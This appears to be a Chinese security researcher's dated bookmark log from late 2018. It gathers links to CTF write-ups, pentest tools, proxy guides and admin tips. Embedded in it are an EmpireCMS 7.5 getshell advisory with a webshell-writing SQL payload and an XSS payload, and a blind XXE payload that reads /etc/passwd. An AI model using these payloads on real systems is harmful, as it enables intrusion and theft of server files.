胖哈勃杯第十三届CUIT校赛web300短域名工具wp及出题心得 https://www.cnblogs.com/iamstudy/articles/13th_cuit_game_wp_web300_ssrf.html https://github.com/l3m0n/My_CTF_Challenges/tree/master/13th_CUIT_Game 一个各种方式突破Disable_functions达到命令执行的shell https://github.com/l3m0n/Bypass_Disable_functions_Shell l3m0n-渗透测试中的那点小事 https://github.com/SycloverSecurity/papers/blob/master/2017%E8%A1%A5%E5%A4%A9%E6%B2%99%E9%BE%99%E6%88%90%E9%83%BD%E7%AB%99/l3m0n-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E9%82%A3%E7%82%B9%E5%B0%8F%E4%BA%8B.pdf 科学上网翻墙教程 https://sphard.github.io/gfw/ https://sphard.github.io/gfw/free/ssr.html https://github.com/gfw-breaker/ssr-accounts 免费梯子 https://github.com/XX-net/XX-Net Auto Install Shadowsocks Server for CentOS/Debian/Ubuntu https://teddysun.com/536.html https://github.com/teddysun/shadowsocks_install Sentry 是一个开源的实时错误报告工具,支持 web 前后端、移动应用以及游戏,支持 Python、OC、Java、Go、Node.js、Django、RoR 等主流编程语言和框架 ,还提供了 GitHub、Slack、Trello 等常见开发工具的集成。 https://github.com/getsentry/sentry 个人收集整理科学上网的资料 https://github.com/wcmbeta/GFWdata 关于Shadowsocks的小白常见问题 总结篇 https://doub.io/ss-jc35/ 几款 Shadowsocks 的 Docker 镜像 https://shadowsocks.be/12.html vulnerable-node nodejs搭建的漏洞靶场 https://github.com/cr0hn/vulnerable-node WEB CTF CheatSheet https://github.com/w181496/Web-CTF-Cheatsheet 『原创』实时监测服务器IP是否被墙并推送消息至 Telegram 一键脚本 https://doub.io/shell-jc8/ Bottle HTTP 头注入漏洞探究 https://www.leavesongs.com/PENETRATION/bottle-crlf-cve-2016-9964.html CRLF Injection Into PHP’s cURL Options https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545 ## 16 owasp中文翻译大全 https://www.andseclab.com/category/owasp/ XSS记录 浅谈跨站脚本攻击与防御 https://thief.one/2017/05/31/1/ https://thief.one/2017/03/15/Xss%E5%B9%B3%E5%8F%B0%E6%90%AD%E5%BB%BA%E5%B0%8F%E8%AE%B0/ Web安全系列 -- XSS漏洞 https://xz.aliyun.com/t/1672#toc-6 骚年,看我如何把 PhantomJS 图片的 XSS 升级成 SSRF/LFR https://paper.seebug.org/344/ day-05 浅入深出的xss https://roytse.github.io/2017/08/05/0x04-Web第三天/ 从瑞士军刀到变形金刚--XSS攻击面拓展 https://lorexxar.cn/2017/08/23/xss-tuo/#%E6%B5%8B%E8%AF%95%E7%8E%AF%E5%A2%83 浙江大学AAA战队开放 CTF 练习平台新前端 https://github.com/Deturium/School-Bus 【CVE-2018-1259】XXE with Spring Data’s XMLBeam 分析 https://xz.aliyun.com/t/2341#toc-0 Spring Data Commons Remote Code Execution 分析-【CVE-2018-1273】 https://xz.aliyun.com/t/2269 https://vulhub.org/#/environments/spring/CVE-2018-1273/ https://github.com/iflody/myBugAnalyze/tree/master/2018/CVE-2018-1273 ## 17 网络空间资产搜索引擎的有趣玩法 https://mp.weixin.qq.com/s/ByGe4x__Vjz7a7zCorDniQ ``` body="Overall Analyzed Requests" && title=="Server&nbsp;Statistics" ``` 【渗透神器系列】搜索引擎 https://thief.one/2017/05/19/1/ Shodan手册 http://b404.xyz/2018/02/08/Shodan-Manual https://b404.gitbooks.io/shodan-manual/content/instruction.html 开源大规模扫描、暴破、漏洞利用工具包Leviathan https://bbs.pediy.com/thread-217485.htm https://github.com/tearsecurity/leviathan Pentester Academy 出品的一个攻防实验平台 https://public.attackdefense.com 各种安全相关思维导图整理收集 https://github.com/phith0n/Mind-Map How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html 各种安全大会PPT PDF https://github.com/bit4woo/Summit_PPT 猪猪侠paper https://github.com/ring04h/papers ## 18 Zeppelin ethernaut writeup(以太坊) http://www.bendawang.site/2018/11/13/Zeppelin-ethernaut-writeup/ php漏洞全解(待施工) https://zhuanlan.zhihu.com/p/47818756 ## 19 代理池,自动更换ip 17年blackhat上提到的一个工具,利用tor网络做代理池更换IP。项目地址 https://github.com/realgam3/pymultitor Git上的一个http的代理池项目,会从全网找到http代理,自动从代理池随机取代理更换线路。 https://github.com/imWildCat/scylla [安全小课堂第119期【渗透测试之几个拦截行为bypass】](https://mp.weixin.qq.com/s/eOq8-4oSBuawn3EHhJLBoA) Docker删除images报错 Error: No such image: 或 删除 镜像 的解决方法 https://blog.csdn.net/linkvivi/article/details/79790920 【渗透神器系列】Metasploit https://thief.one/2017/08/01/1/ Windows下快捷方式攻防技巧 https://bbs.ichunqiu.com/thread-40731-1-1.html wasm的api https://www.w3.org/TR/wasm-js-api-1/ https://github.com/WebAssembly/wabt ## 20 EXIF information viewer(查看照片中隐藏的各类信息) http://feei.cn/exif https://github.com/FeeiCN/EXIF GSIL(GitHub敏感信息泄露) https://github.com/FeeiCN/GSIL Source Code Security Audit (源代码安全审计) http://cobra.feei.cn https://github.com/WhaleShark-Team/cobra Enumeration sub domains(枚举子域名) http://feei.cn/esd https://github.com/FeeiCN/ESD 收集扫描规则(payload) https://feei.cn/payload >可以利用上面方式收集所有未公开的漏洞检测方法,甚至是漏洞利用方式。并且用同样的方法去收集类似百度安全宝、唐朝安全扫描等等的规则集。 The Big List of Naughty Strings is a list of strings which have a high probability of causing issues when used as user-input data. https://github.com/minimaxir/big-list-of-naughty-strings 基于 docker 的蜜罐系统设计 https://lightless.me/archives/docker-honeypot.html https://www.xsec.io/2018/8/28/Diy-A-High-Interactivity-SSH-HoneyPot-With-Docker.html Docker Remote api在安全中的应用杂谈 https://www.xsec.io/2017/2/14/docker-remote-api-sec-misc.html PAM 记录别人尝试爆破登录SSH的账号密码 https://lightless.me/archives/kokkuri-s-revenge.html https://github.com/lightless233/pam_my_unix 小米安全文章 https://sec.xiaomi.com/article 跨平台的安全检测工具包 https://www.xsec.io/2018/9/21/secruity-detect-tool.html https://github.com/netxfly/sec_check ## 21 Email收集神器之Prowl https://bbs.ichunqiu.com/thread-48055-1-1.html Hackme有趣的web题解 https://mp.weixin.qq.com/s/4kDfZPz9Bxz4xvgFuUvA5A hackme网站边做边记录 https://skysec.top/2018/01/07/hackme%E7%BD%91%E7%AB%99%E8%BE%B9%E5%81%9A%E8%BE%B9%E8%AE%B0%E5%BD%95/ 简单服务器 php -S 127.0.0.1:80 如果`Failed to listen on 127.0.0.1:80 (reason: Permission denied)`,在前面加个sudo python -m SimpleHTTPServer 80 https://my.oschina.net/jsan/blog/529164 安装nc sudo apt-get -y install netcat-traditional DNS劫持 https://www.phpyuan.com/236012.html https://www.freebuf.com/articles/network/131385.html http://blog.51cto.com/ljy123/1886486 本地host修改 https://stackoverflow.com/questions/138162/wildcards-in-a-windows-hosts-file 技术分析 | 我们来“劫持”个GitHub自定义域名玩吧! https://www.freebuf.com/articles/web/171952.html https://help.github.com/articles/troubleshooting-custom-domains/#unsupported-custom-domain-name 启动docker脚本随手记一下 ``` #/bin/bash docker run --rm -p $1:80 -v `pwd`/www:/var/www/html $2 ``` crontab命令 http://man.linuxde.net/crontab ## 22 基于 Docker 的真实应用测试环境 https://github.com/baidu-security/app-env-docker A collection of pentest and development tips https://github.com/xssfile/Attack-data cheatsheets https://devhints.io/ 信息安全技术文章每日汇总 https://victor-infosec.github.io/ 内网渗透有它就够了,手把手教你破解CobaltStrike3.12 https://mp.weixin.qq.com/s/SuVrMNhGiTfdOTY1CmGRbw OpenRASP https://www.freebuf.com/articles/web/164413.html https://rasp.baidu.com/doc/usage/cve.html#php https://github.com/baidu/openrasp ## 23 浅析xml及其安全问题 https://skysec.top/2018/08/17/%E6%B5%85%E6%9E%90xml%E5%8F%8A%E5%85%B6%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/ xss->ssrf->redis https://skysec.top/2018/08/17/xss-ssrf-redis/ 科普 | 什么是CRLF注入攻击? https://zhuanlan.zhihu.com/p/22953209 新浪某站CRLF Injection导致的安全问题 https://www.leavesongs.com/PENETRATION/Sina-CRLF-Injection.html weblogic 漏洞复现 https://98587329.github.io/2018/10/30/weblogic-复现 搜索引擎 https://duckduckgo.com/ 一篇文章带你深入理解漏洞之 XXE 漏洞 https://xz.aliyun.com/t/3357#toc-0 CentOS下使用yum安装python-pip失败的完美解决方法 https://www.linuxidc.com/Linux/2018-10/154707.htm Shellver - Reverse Shell Cheat Sheet Tool https://www.kitploit.com/2018/11/shellver-reverse-shell-cheat-sheet-tool.html https://github.com/0xR0/shellver 杂谈区块链生态里的前端黑 https://mp.weixin.qq.com/s/d_4gUc3Ay_He4fintNXw6Q 慢雾区github https://github.com/slowmist 史上最强内网渗透知识点总结 https://mp.weixin.qq.com/s/U2MqcjA_YmMlajJzvDCZZw Struts2 历史版本的漏洞环境 https://github.com/0kami/Struts2Environment CMS Scanner: Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues https://github.com/ajinabraham/CMSScan 为ctf而生的web扫描器 https://github.com/kingkaki/ctf-wscan 渗透 比较全面的渗透资料💯 包含:0day,xss,sql注入,提权…… https://github.com/w1109790800/penetration empireCMS7.5 Vulnerability Impact version <=7.5 Backstage getshell and XSS https://github.com/novysodope/empireCMS7.5 GetShell ``` Dwonload the EmpireCMS 7.5,open file :\e\admin\db\DoSql.php,look at the code: line143 Sql carried out: -------------------code------------------------------ function ExecSql($id,$userid,$username){ global $empire,$dbtbpre; $id=(int)$id; if(empty($id)) { printerror('EmptyExecSqlid',''); } $r=$empire->fetch1("select sqltext from {$dbtbpre}enewssql where id='$id'"); if(!$r['sqltext']) { printerror('EmptyExecSqlid',''); } $query=RepSqlTbpre($r['sqltext']); DoRunQuery($query); -------------------code end------------------------------ Verification userid,username,then direct query. ------Use------- Installation EmpireCMS 7.5, at backstage management - SQL execution,Insert attack command: Url:http://127.0.0.2:8080/e/admin/admin.php?ehash_ZggST=fK6I2xSKLEmuO6qZXF9A Use MYSQL 'into outfile' tenerate PHP trojan. Payload:select '<?php @eval($_POST[1])?>' into outfile 'D:/wwwroot/diguocms/1.php' Execution succeed,connect PHP trojan http://127.0.0.1:8080/1.php,password is 1. ``` ``` Dwonload the EmpireCMS 7.5,open file :\e\admin\db\DoSql.php,look at the code: File : \e\admin\db\DoSql.php In line 75 AddSql: -------------------code------------------------------ function AddSql($add,$userid,$username){ global $empire,$dbtbpre; if(!$add['sqlname']||!$add['sqltext']) { printerror("EmptySqltext","history.go(-1)"); } $add['sqlname']=hRepPostStr($add['sqlname'],1); $add[sqltext]=ClearAddsData($add[sqltext]); $sql=$empire->query("insert into {$dbtbpre}enewssql(sqlname,sqltext) values('".$add['sqlname']."','".addslashes($add[sqltext])."');"); $lastid=$empire->lastid(); if($sql) } -------------------code end----------------------------- Save the input directly, there is no other processing mechanism like filtering? And line143 Sql carried out: -------------------code------------------------------ function ExecSql($id,$userid,$username){ global $empire,$dbtbpre; $id=(int)$id; if(empty($id)) { printerror('EmptyExecSqlid',''); } $r=$empire->fetch1("select sqltext from {$dbtbpre}enewssql where id='$id'"); if(!$r['sqltext']) { printerror('EmptyExecSqlid',''); } $query=RepSqlTbpre($r['sqltext']); DoRunQuery($query); -------------------code end------------------------------ Judge whether the sql syntax is correct, and continue to execute other content,The output page is also not filtered. ----Use---- Installation EmpireCMS 7.5, at backstage management - SQL execution,Insert attack command. Url:http://127.0.0.2:8080/e/admin/admin.php?ehash_ZggST=fK6I2xSKLEmuO6qZXF9A Payload(mine is html ): -------Html code---- <html> test </html> -------------Code end------ Display SQL command error,but other scripts will continue to execute,and add SQL: Payload: -------code------- <script>alert(1)</script> -----code end-------- Carried out success,f12 can see that the code has been parsed. ``` PHP正则表达式后面接的/isU, /is, /s 啊这些是什么意思? https://blog.csdn.net/liuanqi3/article/details/4505286 :::success i 匹配大小写 s 模式中的圆点元字符(.)匹配所有的字符,包括换行符 x 模式中的空白字符除了被转义的或在字符类中的以外完全被忽略,在未转义的字符类之外的 # 以及下一个换行符之间的所有字符,包括两 头,也都被忽略 A (PCRE_ANCHORED) 如果设定了此修正符,模式被强制为“anchored”,即强制仅从目标字符串的开头开始匹配即自动在模式开头加上^。 D (PCRE_DOLLAR_ENDONLY) 如果设定了此修正符,模式中的美元元字符仅匹配目标字符串的结尾。没有此选项时,如果最后一个字符是换行符的话,美元符号也会匹配此字符之前(但不会匹配任何其它换行符之前)。如果设定了 m 修正符则忽略此选项。Perl 中没有与其等价的修正符。  S 当一个模式将被使用若干次时,为加速匹配起见值得先对其进行分析。如果设定了此修正符则会进行额外的分析。目前,分析一个模式仅对没有单一固定起始字符的 non-anchored 模式有用。  U (PCRE_UNGREEDY) 本修正符反转了匹配数量的值使其不是默认的重复,而变成在后面跟上“?”才变得重复。这和 Perl 不兼容。也可以通过在模式之中设定 (?U) 修正符来启用此选项。 X (PCRE_EXTRA) 此 修正符启用了一个 PCRE 中与 Perl 不兼容的额外功能。模式中的任何反斜线后面跟上一个没有特殊意义的字母导致一个错误,从而保留此组合以备将 来扩充。默认情况下,和 Perl 一样,一个反斜线后面跟一个没有特殊意义的字母被当成该字母本身。当前没有其它特性受此修正符控制。即:贪婪模式,最 大限度匹配 如:/a[/w]+?e/U匹配abceadeddd中的abceade而不是abce,如果不加U修正,则匹配abce  u (PCRE_UTF8) 此修正符启用了一个 PCRE 中与 Perl 不兼容的额外功能。模式字符串被当成 UTF-8。本修正符在 Unix 下自 PHP 4.1.0 起可用,在 win32 下自 PHP 4.2.3 起可用。 ::: 常见渗透测试靶场系统 http://sec-redclub.com/archives/987/ XSS靶场 https://xss-game.appspot.com/level1 https://github.com/haozi/xss-demo 设置docker容器开启启动 ``` sudo docker run --restart=always ..... 如果创建时未指定 --restart=always ,可通过update 命令设置 docker update --restart=always xxx ``` ## 24 POC2018 Slides http://powerofcommunity.net/2018.htm 初探APT 攻击 https://www.cnblogs.com/anbus/p/9994582.html Dnslog在SQL注入中的实战 https://www.anquanke.com/post/id/98096 『CoNote 安全测试辅助工具』演示 ​ https://weibo.com/tv/v/GyBp3tEZp?sudaref=wx.zsxq.com&display=0&retcode=6102#_loginLayer_1543063900714 https://phithon.gitbooks.io Bypassing disabled exec functions in PHP via imap_open (Debian & Ubuntu) https://github.com/Bo0oM/PHP_imap_open_exploit http://php.net/manual/zh/function.imap-open.php 利用php的imap扩展绕过禁用函数限制执行系统命令.pdf 某面板6.x版本前台存储xss+后台csrf组合拳getshell https://xz.aliyun.com/t/3177#toc-3 ssrf、ssrf内网地址fuzz、dns二次rebinding、支持ipv4/ipv6、支持ip地址转换码、dns记录污染(文末一个0day为例)。脑图在脑子里,懒得画了。 https://github.com/Tr3jer/dnsAutoRebinding ## 25 利用PNG像素隐藏PE代码:分析PNG Dropper新样本 - 安全客,安全资讯平台 本文将主要针对PNG Dropper恶意软件进行分析,这一恶意软件是由Turla组织开发和使用的。但是最近,NCC的研究人员发现了一个带有新型Payload的样本,我们在内部将其命名为RegRunnerSvc。 www.anquanke.com CVE-2018-16323:如何利用 ImageMagick内存泄漏 - 安全客,安全资讯平台 在本文中我们将讨论ImageMagick内存泄露漏洞CVE-2018-16323并研究如何进行防护。 www.anquanke.com https://github.com/ttffdd/XBadManners​ 那么整个漏洞的利用步骤如下 - 生成一个PoC - 上传这个图像到受影响的应用中 - 存储结果图片 - 将其转换为xbm格式以提取信息 将CRLF注入到PHP的cURL选项中 https://www.anquanke.com/post/id/153933 Making a Blind SQL Injection a Little Less Blind https://medium.com/@tomnomnom/making-a-blind-sql-injection-a-little-less-blind-428dcb614ba8 CRLF Injection漏洞利用与学习 http://www.0xby.com/120.html CRLF injection 简单总结 https://blog.csdn.net/qq_19876131/article/details/50577995 Exploiting SSRF in Video Converters https://www.youtube.com/watch?v=tZil9j7TTps https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf httpbin.org A simple HTTP Request & Response Service. http://httpbin.org/#/Request_inspection/get_ip ## 26 ## 27 前端入门和进阶学习笔记,超详细的前端学习图文教程。从零开始学前端,做一个web全栈工程师。持续更新... https://github.com/smyhvae/Web ## 28 LCTF 2017 三道Web题的wp及其思考 https://xz.aliyun.com/t/1635#toc-0 模式修饰符 http://php.net/manual/zh/reference.pcre.pattern.modifiers.php 软链接 文件上传 https://xz.aliyun.com/t/2589 客户端 session 导致的安全问题 https://www.leavesongs.com/PENETRATION/client-session-security.html 逢魔安全实验室文章 https://www.secpulse.com/archives/author/formsec ## 29 Web安全知识点列表 https://github.com/ngalongc/bug-bounty-reference 哈希长度扩展攻击的简介以及HashPump安装使用方法 https://www.cnblogs.com/pcat/p/5478509.html phpwind 利用哈希长度扩展攻击进行getshell https://www.leavesongs.com/PENETRATION/phpwind-hash-length-extension-attack.html hash长度扩展攻击研究 http://seaii-blog.com/index.php/2017/05/12/56.html 深入理解hash长度扩展攻击(sha1为例) https://www.freebuf.com/articles/web/69264.html 道哥在的一篇博客:http://blog.chinaunix.net/uid-27070210-id-3255947.html whalectf隐藏的web题们 https://www.zybuluo.com/shaobaobaoer/note/1058596 ## 30 MkDocs-wiki文档框架 https://www.mkdocs.org/ https://github.com/mkdocs/mkdocs # 日志 2018/12 ## 2 Linux查看系统开机时间 http://www.cnblogs.com/kerrycode/p/3759395.html ``` who -b 查看最后一次系统启动的时间。 who -r 查看当前系统运行时间 last reboot 可以看到Linux系统历史启动的时间。 ``` ## 5 Real World CTF Of "The Return of One Line PHP Challenge" https://www.anquanke.com/post/id/167219 从一道CTF练习题浅谈php原生文件操作类 https://www.anquanke.com/post/id/167140 ## 6 docker could not find an available, non-overlapping IPv4 address pool among the defaults to assign to the network ``` 原因: 无法进行网络分配了 解决方法: // 所有的网络 docker network ls // 删除不用的,腾出多余的 docker network rm <networkname> ``` ## 9 Windows Explorer资源管理器 管理工具 CLOVER http://cn.ejie.me/ 资源管理器 XYPlorer Pro v19.40.0100 绿色便携版 https://www.appcgn.com/xyplorer-pro.html 红米note5 谷歌框架一套 http://bbs.xiaomi.cn/t-15105414 捣鼓了很久在手机 chrome浏览器登录账号 本机的不行,设置了权限也还是一样 最后还是在谷歌空间导入chrome,登录上了 Windows Forensics Course https://www.pentesteracademy.com/course?id=23 BlackHat Python之socket编程和简单的netcat https://www.secpulse.com/archives/40819.html 《青春猪头少年系列》轻小说下载[EPUB/MOBI/TXT][1-9卷+短篇][连载中] https://go2think.com/ao-buta-novel/ https://ouo.us/ https://nyaso.com/ ## 10 最新BurpSuite 1.7.32 破解版[注册机]下载【无后门版】 http://www.vuln.cn/8847 各大安全峰会ppt https://www.hackinn.com/ [HTB] Jerry — Write Up https://medium.com/@gizmoxf/htb-jerry-write-up-b5c75222311d Why Blockchain is Hard https://medium.com/@jimmysong/why-blockchain-is-hard-60416ea4c5c Real World CTF 2018 rwext5命题报告 https://maskray.me/blog/2018-12-09-real-world-ctf-2018-rwext5 ## 13 权威nodejs手册 https://medium.freecodecamp.org/the-definitive-node-js-handbook-6912378afc6e ## 15 从XXE盲注到获取root级别文件读取权限 https://www.anquanke.com/post/id/167946 Python Web之flask session&格式化字符串漏洞 https://xz.aliyun.com/t/3569 浅析PHP正则表达式的利用技巧 https://xz.aliyun.com/t/3537 由七道题目浅析RSA原理 https://xz.aliyun.com/t/3558 Here are the most popular ways to make an HTTP request in JavaScript https://medium.freecodecamp.org/here-is-the-most-popular-ways-to-make-an-http-request-in-javascript-954ce8c95aaa http/3 https://github.com/bagder/http3-explained/blob/master/zh/SUMMARY.md ## 16 v2ray https://toutyrater.github.io/ https://github.com/tracyone/v2ray.fun https://yuan.ga/v2ray-complete-tutorial/ https://github.com/v2ray/v2ray-core/releases Web Fuzz https://xz.aliyun.com/t/3600 ## 17 漫画赏析:Linux 内核到底长啥样 https://zhuanlan.zhihu.com/p/51679405 神奇的 Linux 命令行字符形状工具 boxes https://zhuanlan.zhihu.com/p/52558937 Flask入门系列(一)–Hello World http://www.bjhee.com/flask-1.html Flask中Jinja2模板引擎详解(一)–控制语句和表达式 http://www.bjhee.com/jinja2-statement.html Flask模板引擎:Jinja2语法介绍 https://zhuanlan.zhihu.com/p/23669244 ## 18 docker thinkphp5 rce环境 docker pull w3bdoge/thinkphp5,映射80端口即可使用,thinkphp5.1.30框架,需要复现的可以拿去玩 Real World CTF 2018 Finals wp https://blog.tonkatsu.info/ctf/2018/12/17/realworldctf-finals.html 小Tip:使用本地DTD文件来利用XXE漏洞 https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ https://www.anquanke.com/post/id/168012 https://articles.zsxq.com/id_85l86vkeu8zf.html ``` <?php simplexml_load_file('php://input'); 这就是一个典型的没有回显的XXE。我们发送如下payload: <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % NUMBER ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; '> %NUMBER; ]> <message>any text</message> ``` tar命令 ``` 压缩 tar –cvf jpg.tar *.jpg //将目录里所有jpg文件打包成jpg.tar tar –czf jpg.tar.gz *.jpg //将目录里所有jpg文件打包成jpg.tar后,并且将其用gzip压缩,生成一个gzip压缩过的包,命名为jpg.tar.gz tar –cjf jpg.tar.bz2 *.jpg //将目录里所有jpg文件打包成jpg.tar后,并且将其用bzip2压缩,生成一个bzip2压缩过的包,命名为jpg.tar.bz2 tar –cZf jpg.tar.Z *.jpg //将目录里所有jpg文件打包成jpg.tar后,并且将其用compress压缩,生成一个umcompress压缩过的包,命名为jpg.tar.Z 解压 tar –xvf file.tar //解压 tar包 tar -xzvf file.tar.gz //解压tar.gz tar -xjvf file.tar.bz2 //解压 tar.bz2tar –xZvf file.tar.Z //解压tar.Z ``` HTTPie HTTPie 是一个命令行 HTTP 客户端。目标是让 CLI 与 Web services 的交互尽可能的更友 好。它提供了一个简单的 http 命令,可以让我们用简单自然的表述发送任意 HTTP 请求 ,并且可以输出带代码高亮的结果。HTTPie 可以使用在测试、调试以及通用的与 HTTP 交 互场景 https://github.com/jakubroztocil/httpie/ https://httpie.org/doc#main-features https://keelii.com/2018/09/03/HTTPie/ 湖南第二届大学生网络安全技能竞赛web解题记录 https://www.anquanke.com/post/id/167637 Blockchain CTF v2 write up https://www.anquanke.com/post/id/168037 Fuxi-Scanner Fuxi-Scanner 是一款开源的网络安全检测工具,适用于中小型企业对企业信息系统进行安全巡航检测 https://github.com/jeffzh3ng/Fuxi-Scanner/blob/master/doc/README.zh.md PHP-escapeshell-命令执行 https://www.anquanke.com/post/id/168093 子域名 https://xiaix.me/zi-yu-ming-fa-xian-gong-ju/ https://5alt.me/2018/01/%E5%AD%90%E5%9F%9F%E5%90%8D%E6%94%B6%E9%9B%86%E5%8F%8A%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%E4%B9%8BZeroScan/ wydomain2 - 猪猪侠的作品,好用不解释。 从alexa、chaxunla、ilinks、google、sitedossier、netcraft、threatcrowd、threatminer爬取结果,再与openssl证书+字典穷举结果合并,生成最终的子域名集合。 subDomainsBrute - 曾经乌云核心白帽李劼杰的作品 Layer 子域名挖掘机 - 法师的作品,因为是用.NET写的,所以基本只能在Win下使用,也是相当好用的。 在线子域名 http://tools.bugscaner.com/subdomain/ http://tool.chinaz.com/subdomain ## 19 [自定义提示框消息提示](https://www.jianshu.com/p/0feab70b2ac7) ```html <div class="message alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert">&times;</button> <strong>{{ process['pid'] }}</strong> 进程占用CPU过高 </div> ``` ```javascript $('.message').css('display', 'block'); setTimeout(function () { //这里设置了一个定时器 $(".message").css("display", "none"); }, 2500); //这里的参数来控制消失的时间 ``` 绕过限制利用curl读取写入文件 https://www.anquanke.com/post/id/98896 Day5题解:(By l1nk3r) https://github.com/hongriSec/PHP-Audit-Labs/tree/master/PHP-Audit-Labs%E9%A2%98%E8%A7%A3/Day5-8/files http://wonderkun.cc/index.html/?p=670 ![](https://i.imgur.com/xzi9lqX.png) curl命令 http://man.linuxde.net/curl https://itbilu.com/linux/man/4yZ9qH_7X.html https://curl.haxx.se/docs/manpage.html ## 21 https://d0n9.github.io/2016/12/08/Pwnhub%E5%85%AC%E5%BC%80%E8%B5%9B%20Web%E9%A2%98%E7%9B%AEwriteup/# HITCTF-WEB题解 https://skysec.top/2018/02/01/HITCTF-WEB%E9%A2%98%E8%A7%A3/ 0day:Windows任意文件读取漏洞:[Hacker Discloses New Unpatched Windows Zero-Day Exploit On Twitter](https://thehackernews.com/2018/12/windows-zero-day-exploit.html) PoC: https://sandboxescaper.blogspot.com/2018/12/readfile-0day.html [Facebook BugBounty — Disclosing page members](https://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520) Burpsuite自带小功能分享 https://xz.aliyun.com/t/2081 Thinkphp5 远程代码执行漏洞事件分析报告 https://paper.seebug.org/770/ Better NPM'ing, Tips and Tricks using NPM http://www.tomsquest.com/blog/2018/10/better-npm-ing/ https://pentester.land/list-of-bug-bounty-writeups.html Hidden directories and files as a source of sensitive information about web application https://medium.com/@_bl4de/hidden-directories-and-files-as-a-source-of-sensitive-information-about-web-application-84e5c534e5ad?tdsourcetag=s_pctim_aiomsg > 敏感文件信息泄露 R3con1z3r is a lightweight Web information gathering tool with an intuitive features written in python. https://github.com/abdulgaphy/r3con1z3r ## 22 [sqlmap tamper脚本编写](https://mp.weixin.qq.com/s?__biz=MzU1MzE3Njg2Mw==&mid=2247485999&idx=1&sn=c5d36427f58e7a625b2e21bcd960c69e&chksm=fbf7905fcc801949d6a64285639581ac781096d1d9dd2fee3fddb5df063649f444b4e9a064ed&mpshare=1&scene=23&srcid=1222Cun1vT1fnjcjdijnRwuQ#rd) 从0开始你的域渗透之旅 https://hunter2.gitbook.io/darthsidious/ https://github.com/crazywa1ker/DarthSidious-Chinese Detailed writeup of both one line php and Return of one line php https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ Real World CTF Of "The Return of One Line PHP Challenge" https://www.anquanke.com/post/id/167219 One Line PHP Challenge without session.upload https://hackmd.io/s/rJlfZva0m RCE in Hubspot with EL injection in HubL https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html SWPUCTF2018-WEB&MISC Write Up https://www.anquanke.com/post/id/168308 ## 23 无需sendmail:巧用LD_PRELOAD突破disable_functions https://www.freebuf.com/articles/web/192052.html 如何在Typora编辑器上实现远程命令执行 https://zhuanlan.zhihu.com/p/51768716 从零开始搭建轻量级个人XSS平台 https://blog.csdn.net/itest_2016/article/details/77650356 BCTF2018源码 https://github.com/blue-lotus/BCTF2018 powershell翻墙 https://github.com/shadowsocks/shadowsocks-windows/issues/1489 ## 24 PHP RCE Bypass filters, sanitizations and WAF rules https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/ php代码执行绕过 字符串十六进制表示 ![](https://i.imgur.com/RUkiAkN.png) 字符串表示方法 ![](https://i.imgur.com/4wf6X6f.png) 利用get_defined_functions ![](https://i.imgur.com/sysxywg.png) 利用__file__文件内容,用数组构造payload ![](https://i.imgur.com/2XDHp1B.png) Paramalyzer - Burp extension for parameter analysis of large-scale web application penetration tests. https://github.com/JGillam/burp-paramalyzer OWASP ModSecurity Core Rule Set (CRS) Web防火墙 https://coreruleset.org/ https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project ## 25 iSlide 好用的 PPT 插件 https://www.islide.cc/features 偶遇一个钓鱼网站,于是就简单玩了一下... https://zhuanlan.zhihu.com/p/28810019 hacklu CTF 2018-IDeaShare-writeup(XSS) https://zer0b.com/2018/10/21/hacklu-ctf-2018-ideashare-cn/#more swf反编译工具 https://github.com/jindrapetrik/jpexs-decompiler ## 26 在线运行各种代码 https://repl.it/ JavaScript 对象深度解析 https://medium.freecodecamp.org/lets-explore-objects-in-javascript-4a4ad76af798 安装Pi-hole,让树莓派为你过滤家中广告! http://shumeipai.nxez.com/2018/02/09/install-pi-hole-for-raspberry-pi-to-filter-advertisement.html https://github.com/pi-hole/pi-hole [tools]DNSthingy Assistant 识别加载网页需要资源的主机 https://chrome.google.com/webstore/detail/dnsthingy-assistant/fdmpekabnlekabjlimjkfmdjajnddgpc/ phishing 列表 https://www.phishing.army/ https://www.phishtank.com/ Telegram 群组、频道、机器人 - 汇总分享 https://congcong0806.github.io/2018/04/24/Telegram/ https://www.bilibili.com/read/cv138054/ @temp_mail_bot 有效期10分钟临时邮箱服务,当你想要临时注册一个网站的账号时就可以用这种临时邮箱服务,避免自己的邮箱泄露也免于各种垃圾广告骚扰。 Linux工具-每月服务器流量使用提醒-TGBot自动监控机器人 https://www.bestcheapvps.org/linuxtools-traffic-tg/ 如何在CentOS 7上安装VnStat网络监控 http://www.vue5.com/centos/22932.html ## 27 [Moonraker靶机渗透测试](https://www.anquanke.com/post/id/168484) 利用 Node.js 反序列化漏洞远程执行代码 https://paper.seebug.org/213/ https://chybeta.github.io/2017/11/01/Node-js%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%9ACVE-2017-5941/ [tools]SQLiScanner Automatic SQL injection with Charles and sqlmap api https://github.com/0xbug/SQLiScanner [Contents for Node.Js Security Course](https://github.com/ajinabraham/Node.Js-Security-Course) [NodeJsScan](https://github.com/ajinabraham/NodeJsScan) [Red Teaming Mind Map from The Hacker Playbook 3](https://www.marcolancini.it/2018/blog-hacker-playbook-mindmap/) 